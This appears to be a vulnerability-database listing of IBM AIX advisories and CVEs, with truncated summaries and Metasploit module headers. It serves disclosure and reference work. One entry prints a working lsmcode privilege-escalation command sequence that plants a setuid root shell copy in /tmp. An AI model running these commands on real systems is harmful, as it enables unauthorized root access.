AIX : Multiple Vulnerabilities (IJ57231)

The version of AIX installed on the remote host is prior to APAR IJ57231. It is, therefore, affected by multiple vulnerabilities as referenced in the IJ57231 advisory. - A flaw was identified in the X.Org X server's X Keyboard Xkb extension where improper bounds checking in the XkbSetCompatMap...

AIX (IJ57282)

The version of AIX installed on the remote host is prior to APAR IJ57282. It is, therefore, affected by a vulnerability as referenced in the IJ57282 advisory. - A vulnerability was found in libxml2 up to 2.14.5. It has been declared as problematic. This vulnerability affects the function...

EUVD-2001-1061

Malware in sbrugna...

EUVD-2022-27590

Malicious code in bioql PyPI...

CVE-2022-47990

IBM AIX 7.1, 7.2, 7.3 and VIOS , 3.1 could allow a non-privileged local user to exploit a vulnerability in X11 to cause a buffer overflow that could result in a denial of service or arbitrary code execution. IBM X-Force ID: 243556...

AIX (IJ4909)

The version of AIX installed on the remote host is prior to APAR IJ4909. It is, therefore, affected by a vulnerability as referenced in the IJ4909 advisory. - The code that processes control channel messages sent to named calls certain functions recursively during packet parsing. Recursion depth ...

CVE-2024-27273

IBM AIX's Unix domain AIX 7.2, 7.3, VIOS 3.1, and VIOS 4.1 datagram socket implementation could potentially expose applications using Unix domain datagram sockets with SOPEERID operation and may lead to privilege escalation. IBM X-Force ID: 284903...

PT-2024-21786 · Ibm · Vios +1

Name of the Vulnerable Software and Affected Versions: IBM AIX versions 7.2 through 7.3 VIOS versions 3.1 through 4.1 Description: The Unix domain datagram socket implementation in IBM AIX could potentially expose applications using Unix domain datagram sockets with the SO PEERID operation, which...

AIX ToolTalk Buffer Overflow

$Id$ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/projects/Framework/ require 'msf/core' class Metasploit3...

ToolTalk rpc.ttdbserverd _tt_internal_realpath Buffer Overflow (AIX)

This module exploits a buffer overflow vulnerability in ttinternalrealpath function of the ToolTalk database server rpc.ttdbserverd. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ToolTalk...

CVE-2004-1329

Untrusted execution path vulnerability in the diag commands 1 lsmcode, 2 diagexec, 3 invscout, and 4 invscoutd in AIX 5.1 through 5.3 allows local users to execute arbitrary programs by modifying the DIAGNOSTICS environment variable to point to a malicious Dctrl program...

AIX 4.3/5.1 < 5.3 - 'lsmcode' Execution Privilege Escalation

mkdirhier /tmp/aap/bin export DIAGNOSTICS=/tmp/aap cat /tmp/aap/bin/Dctrl EOF !/bin/sh cp /bin/sh /tmp/.shh chown root:system /tmp/.shh chmod u+s /tmp/.shh EOF chmod a+x /tmp/aap/bin/Dctrl lsmcode /tmp/.shh milw0rm.com 2004-12-21...

CVE-2002-0747

Buffer overflow in lsmcode in AIX 4.3.3...

CVE-2002-0742

Buffer overflow in pioout on AIX 4.3.3...

CVE-2002-0744

namerslv in AIX 4.3.3 core dumps when called with a very long argument, possibly as a result of a buffer overflow...

IBM AIX enq buffer overflow in -M argument

Overview There is a buffer overflow in the enq command that may allow a local attacker to gain root privileges. Description The enq command is used to add entries to a queue, usually for printing. There is a buffer overflow in the -M argument to the enq command. --- Impact An attacker with access...

IBM AIX nslookup fails to drop root privileges

Overview The nslookup command fails to drop privileges, allowing local attackers to gain root privileges. Description The nslookup program fails to drop the privileges it gains from being setuid. This access appears to be needed to read the "/etc/resolv.conf" file. This problem was described in I...

AIX 4.24.3 - netstat -Z Statistic Clearing

AIX 4.24.3 - netstat -Z Statistic Clearing source: https://www.securityfocus.com/bid/1660/info A vulnerability exists in versions 4.x. x of AIX, from IBM. Any local user can utilize the -Z command to netstat, without needing to be root. This will cause interface statistics to be reset. This could...

AIX 4.1/4.2 - 'pdnsd' Remote Buffer Overflow

// source: https://www.securityfocus.com/bid/3237/info The Source Code Browser's Program Database Name Server Daemon pdnsd component of the C Set ++ compiler for AIX contains a remotely exploitable buffer overflow. This vulnerability allows local or remote attackers to compromise root privileges ...

CVE-1999-1079

Vulnerability in ptrace in AIX 4.3 allows local users to gain privileges by attaching to a setgid program...